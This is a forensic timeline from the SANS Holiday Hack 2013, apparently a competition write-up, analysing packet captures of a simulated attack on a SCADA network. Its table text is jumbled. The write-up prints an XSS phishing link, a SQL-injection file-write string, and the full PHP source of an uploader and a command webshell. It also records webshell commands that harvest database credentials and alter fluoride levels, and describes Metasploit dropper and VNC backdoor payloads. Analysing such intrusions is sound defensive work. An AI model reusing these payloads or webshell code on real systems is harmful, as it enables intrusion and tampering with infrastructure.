SANS Holiday Hack 2013 – Investigation Timeline

43 %
57 %
Information about SANS Holiday Hack 2013 – Investigation Timeline

Published on February 20, 2014

Author: giacomo83m



PCAP file analysis of successful and failed attacks to a simulated SCADA network. The work received an 'Honerable mention' from SANS Institute

WireShark Frame UTC Data Time StreamID N. 0 12/9/2013 20:53:01 Source 3 55 63 HTTP HTTP POP 12/11/2013 14:30:01 12/11/2013 14:31:47 12/11/2013 14:32:20 Destionation Port or Protocol HTTP Event SANS  Holiday  Hack  2013  -­‐  Investigation  Timeline Attack Status Analyst Comments First Packet in CAP Evidence WebSite ValleyElectric TrafficSystemNetworkMap.pdf BedfordFallsTrainSystem.pdf None PDF were checked with Wepawet and doesn't contains any malicious script. They contains network description summarized in 'Assets' Excel tab. GET /pub/firefox/releases/26.0/update/win32/en-US/firefox-25.0.1-26.0.partial.mar USER: dsawyer / PASS: Fashionista From Fri Dec 06 10:53:05 2013 -0500 Delivered-To: None None Failed I'm running around trying to take care of a bunch of tasks today. Can you monitor the Simatic S7-1200 PLC while I am out today? Just click the link below and keep the window open; if the controller shows "red", then let me know.'><script src="”>&elementId=31337&Si=maticModel=371200&ControlInterfaceEnabled&StationName=CP U1212C_ACD=CRly&OperatingMode=Run&ShowStatusColorYES After a browser update Noscript page is automatically opened, that Malicious Domain: It has the number 1 instead of the letter I. XSS: Cross site scripting attacks that injects javascript from Send Variable of the page is Vulnerable to XSS Attacks The link was not clicked ( No Evidences ! ) Noscript blocks XSS attempts. 3792 4323 12/11/2013 15:36:27 12/11/2013 15:36:29 Many Many ARP TCP ARP SWEEP/Network Scan Port Sweep: 80, 443, 102,502,1089,1090,1091,4000,4848,20000,34962,34963, 44818 Recon Recon Enumerate IP addresses in Enumerate TCP Services of: 4782 12/11/2013 15:37:08 Many ARP ARP REPLY (FAKE - ARP POISINING) Duplicate IP address detected for (00:0c:29:f7:f4:9a) - also in use by 5c:86:4a:00:6c:02 (frame 4739) Done Man In the Middle ( The attacker mac address - 00:0c:29:f7:f4:9a ) is in arp cache 00:0c:29:f7:f4:9a of all target IP Addresses enumerated above and sniff communication between master al slaves 5621 159 12/11/2013 15:38:01 12/11/2013 15:38:41 Many ARP HTTP END ARP POISONING modscan_0.1.tar downloaded Recon ModScan is a new tool designed to map a SCADA MODBUS TCP based network. The tool is written in python for portability and can be used on virtually any system with few required libraries 161 12/11/2013 15:39:58 HTTP 12/11/2013 15:39:59 HTTPS Modbus Fuzzer WebPage and Protocol Description redirect to ModBus WebPage: None 162 163 12/11/2013 15:40:16 HTTP Modbus ModLib Fuzzer redirect to None 164 12/11/2013 15:40:16 HTTPS Download: Recon 165 12/11/2013 15:40:47 Recon 12/11/2013 15:42:45 MODBUS 502/TCP 502/TCP Transaction 2, Unit 0, Function 0 (Unknown) 168 Modbus function 15: Write Multiple Coils. Exception: Slave device failure Failed The library can be used as a Modbus fuzzer to send arbitrary and unexpected data to the Modbus server. Furthermore, the library is able to monitor the reaction of the Modbus server. If the Modbus server stops responding, it is assumed that the server stopped working properly. Besides packet generation, sent network packets needs to be recorded in order to repeat exceptions. SCADA ModBus fuzzing over Traffic Grid Controller of Corner of Main & Potter Function 15 failed. No coils has been modified 168 12/11/2013 15:42:50 502/TCP Modbus function 15: Write Multiple Coils. Exception: Slave device failure Failed Function 15 failed. No coils has been modified 243 12/11/2013 17:51:01 HTTP indicator=F- LIMIT INTO OUTFILE var www tmpurykq.php LINES TERMINATED BY Done <?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_na me"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>";}?> Sqlmap is used to exploit SQLInjection: A php file uploader is loaded to remote webserver exploiting the vulnerability of 'indicator' POST variable present in reports.php page. 245 12/11/2013 17:51:02 HTTP POST WEBSHELL TMPBUASE Done Content-Disposition: form-data; name="file"; filename="tmpbuase.php" <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable _functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_ open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512) ;}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents ();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclo se($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?> That's a second stage of SQLMap exploiting. A webshell is uploaded to permit the attacker to execute remote commands. Recon MODBUS/TCP Modbus is a stateless protocol and does not support authentication or encryption. Therefore, the Modbus server will interpret and possibly answer every Modbus request it receives. The Modbus client (also called master) sends a request to the server (also called slave) and the server sends either an answer, exception or nothing back. An answer to a read coils request is visualized in the following figure. Output 1 corresponds to the least-significant bit (LSB) and output 5 to the fifth most significant bit (MSB). Because the request only requested 5 bits of data, three bits of the output (bits 6,7,8) are unused.

247 12/11/2013 17:51:10 HTTP $ ls alarms.php css/ denied.php footer.php header.php images/ index.php js/ login.php logout.php reports.php tmpbuase.php tmpurykq.php Done Directory Listing using a webshell 248 12/11/2013 17:51:13 HTTP $ grep mysql_connect * mysql_connect("localhost","wq-ro","publicworks") Done The attacker searchs and finds mysql credentials: USER wq-ro / PASS publicworks 249 12/11/2013 17:51:30 HTTP echo "update measurement_levels set min=0 where id=4;" | mysql -u wq-ro -ppublicworks wq Done Attacker set 'min' value of measurement_levels of row id 4 to 0 reason? 250 12/11/2013 17:51:39 HTTP echo "select * from measurement_levels where id=4;" | mysql -u wq-ro -ppublicworks wq id:4 indicator_short:Findicator_long:Flouride measurement_type:ppm min:0 mcl:4 mclg:4 None Verification of UPDATE sql command described in SessionID 249 The previous attack (ID249) was successfull, now the min value for ID=4 is zero. 252 12/11/2013 17:51:52 HTTP echo "update additives set amount=0 where id=4;" | mysql -u wq-ro -ppublicworks wq ERROR 1142 (42000) at line 1: UPDATE command denied to user 'wq-ro'@'localhost' for table 'additives' Failed Permission denied ( web user doesn't have grants to do that operation ) 253 12/11/2013 17:51:59 HTTP echo "select * from additives where indicator_id=4;" | mysql -u wq-ro -ppublicworks wq indicator_id:4 indicator_short:Famount:1.8 None Attempt to change Fluoride value Enumerate IP addresses in MITM & MITM STOPPED AT 2013-12-12 20:34:04 (not graceful shutdown) Failed ( Dest MacAddr 00:00:00:00:00:00 ) Recon, Understand Services Opened 13143 12/12/2013 20:28:12 13681 12/21/2013 20:28:14 ARP ARP ARP SWEEP ARP POISONING Recon Failed 13737 12/12/2013 20:28:39 TCP PortSweep (SynScan) from to Recon 13749 12/12/2013 20:28:39 342 Many Many TCP PortSweep (SynScan) from to Recon HTTP Recon HTTP HTTP HTTP HTTP guest login (default credentials) administrator login (default credentials) admin (Default credentials) administrator (Default credentials) Failed Failed Failed Failed POP USER: dsawyer / PASS: Fashionista From Fri Dec 24 19:22:11 2013 -0400 Delivered-To: Done 12/12/2013 21:30:40 344 345 346 347 388 12/25/2013 3:10:55 Online forum browsing to gather MicroLogix 1100 default password For full privileges,cred. are administrator/ml1100 For read-only privileges cred. are guest/guest From Wireshark eq 347 to 363 the attacker continues brute forcing attack using many different passwords Malicious sender already seen in EMAIL analyzed in Wireshark StreamID 63 The Attack is successfull the link is opened in Wireshark StreamID 389 A significant vulnerability in the Allen Bradley controller we are testing was just disclosed. I was able to grab the firmware update. Can you run this patch executable from the control host? The release notes say it will run silently to completion. 389 12/25/2013 3:11:05 HTTP TCP/8081 390 12/25/2013 3:11:18 TCP/1225 394 449 450 453 18739 12/25/2013 3:11:52 12/25/2013 3:14:49 12/25/2013 3:15:13 12/25/2013 3:15:13 12/25/2013 3:15:42 454 12/25/2013 3:15:54 454 455 459 460 GET /ab-qfe.exe HTTP/1.1 Host: HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.5 Date: Wed, 11 Dec 2013 23:17:28 GMT Last-Modified: Wed, 11 Dec 2013 17:16:49 GMT Metasploit Payload: Meterpreter HTTP/HTTPS Communication: reverse_http/reverse_https Done Done Malicious Domain Server DateTime mismatches to FrameTIme The executable was uploaded 5 hours before the download AB-QFE.EXE is a Dropper. When executed it connects to It is related to Metasploit Metaterpreter HTTPS_Reverse StreamID 390 Metasploit Payload ARP SMB SMB SMB HTTP ARP SWEEP Login User: OMyxDDzY Failed Ernie Login Failed Ernie Login Successfull$ Image update of Axis Communication Network Camera Recon Enumerate IP addresses in Failed Done Done Password Authentication Password Authentication SMB Done The attacker install malicious service that will load a backdoor (StreamID 459) 12/25/2013 3:16:01 12/25/2013 3:15:54 SMB TCP/4444 WORKGROUPErnie Successfull Login$ Access CreateFile PJzJEubs.exe WriteFile Content OpenSCManagerW CreateServiceW ServiceName:QEwHRzjs DisplayName:MHaBRU StartServiceW ServiceName:QEwHRzjs Connection Attempt ( Reverse Connection - Backdoor ) SYN/RST Done Failed Backdoor service started Port is still closed 12/25/2013 3:16:01 TCP/4444 transfers to REFLECTIVELOADER DLL Library. Done 12/25/2013 3:16:04 Analysis of the sample suggests that DLL is VNC inject payload of Metasploit Framework: windows/vncinject/bind_tcp: Listen for a connection), Inject a VNC Dll via a reflective loader. 4444 is the default tcp listening port. The attacker shutdowns the power grid and writes on Notepad "Merry Christmas, George Bailey, You Lose!" SCADA Commands to Shutdown the grid executed by Control Panel via abusive VNC connection 460 453 Done VNC TCP/4444 CIP Opens VNC (vs. 3.8) Connection to 24453 12/25/2013 3:16:23 Common Industrial Protocol (SCADA) From Control Panel to Rockwell Automation System Done 24596 12/25/2013 3:16:25 12/25/2013 3:17:20 12/25/2013 3:17:26 10.25.2258 CIP TCP/4444 HTTP CIP SetAttribute VNC Connection Closed Last Packet in CAP Evidence. Streaming Update of Axis Communication Network Camera Done None Evidence of VNC Actions on Workstation Display Please refer to evidences.

Add a comment

Related presentations

Related pages

Timeline of Target's Data Breach And Aftermath: How ...

... following the massive data breach during the holiday ... Timeline of Target's Data ... the hack. Dec. 15, 2013: Target confirms that ...
Read more

SANS DFIR WebCast - Super Timeline Analysis - YouTube

SANS DFIR WebCast - Super Timeline Analysis ... Over the past year investigators have started to use timeline analysis to ... investigation ...
Read more

SANS Digital Forensics and Incident Response Blog | Blog ...

SANS Digital Forensics and Incident Response Blog. 08 Jan 2016. ... Timeline Analysis (22) Training (37) USB Device Analysis (13) Volatility (2) Windows IR ...
Read more

SANS Institute InfoSec Reading Room

Target shoppers got an unwelcome holiday surprise in Decem ber 2013 when ... Timeline of Target's data ... from SANS Institute: ...
Read more

SANS Institute InfoSec Reading Room

SANS Institute InfoSec Reading Room ... 2013). Others can access ... A timeline showing the count of results is included by default
Read more

Target’s Data-Breach Timeline - Corporate Intelligence - WSJ

... U.S. stores during the holiday ... Timeline . Article ... investigation: Nov. 27-Dec. 15: A data hack at U.S. Target stores ...
Read more

Digital Forensics Training | Incident Response Training | SANS

The Computer Forensics, Investigation and Response course from ... "SANS Computer Forensics Graduate Thwarts Bank ... "A great course on timeline, ...
Read more

Snacks - Criminal Case Wiki - Wikia

There are 3 types of snacks: Orange Juice: ... They cannot be harvested on timelines, ... (25 July 2013), burgers gave 100 energy points.
Read more